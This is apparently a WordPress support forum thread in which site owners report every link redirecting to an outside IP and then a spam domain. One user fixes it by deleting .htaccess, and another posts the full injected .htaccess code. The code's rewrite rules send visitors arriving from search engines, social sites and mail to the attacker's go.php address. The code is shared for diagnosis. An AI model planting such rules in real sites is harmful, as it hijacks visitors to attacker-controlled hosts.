I just went to your site and I don’t see any links leading to external sites. Has this been fixed already?
I’m new to posting in Forums so forgive me. Where do I start a new thread/topic? As it is, I’m having the same problem today at http://www.customstickermakers.com.
All links are now redirecting to the home page. Yesterday, I had a string of emails from Wordfence alerting me to multiple lock outs due to too many log in attempts. I identified the range of IP addresses and blocked, however, I’m thinking that wasn’t enough.
Definitely need support in this.
Thread Starter
axiaer
(@axiaer)
Hi Senff,
Thanks for viewing the site, no the issue has not been fixed apparently i’m still getting the redirect, please find attached i’ve tried to capture the three transactions
here is case for testing:
Test Domain
First when you click on any link on any link
Image 01
Then there is a redirect to “46.161.41.162/sds/go.php?sid=1”
Image 02
Then the page is redirected to “doctorsro.com”
Image 03
The domain http://indulgebeautystudio.co.uk/ appears to start working again after reinstallation of fresh copy, but is there any easier way to go about?
Hope that helps in understanding and finding a resolution.
for whatever it’s worth, I just deleted my .htaccess file and reset the permalinks. Fixed it…
Thread Starter
axiaer
(@axiaer)
@melimojo You are brilliant, i believe this is some sort of sick SEO hack all the websites which were using .htaccess file to URL rewriting were effected as all the .htaccess were infected.
Thanks a lot, i’m happy to make this issue as resolved. I’m attaching following hack code for your reference and necessary action for WordPress future updates.
Following is the code injected in .htaccess file
`<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace).(.*)
RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline).(.*)
RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(inbox|spam|mail).(.*)
RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
</IfModule>
ErrorDocument 404 http://46.161.41.152/sds/go.php?sid=1`
Please make sure the rest of your site is not hacked. Although you fixed the .htaccess file, it doesn’t mean your site is clean now.
Changing the .htaccess file is just one way of hacking it — if they got access to that, there’s a good change they had access to other things (and infected those) as well.
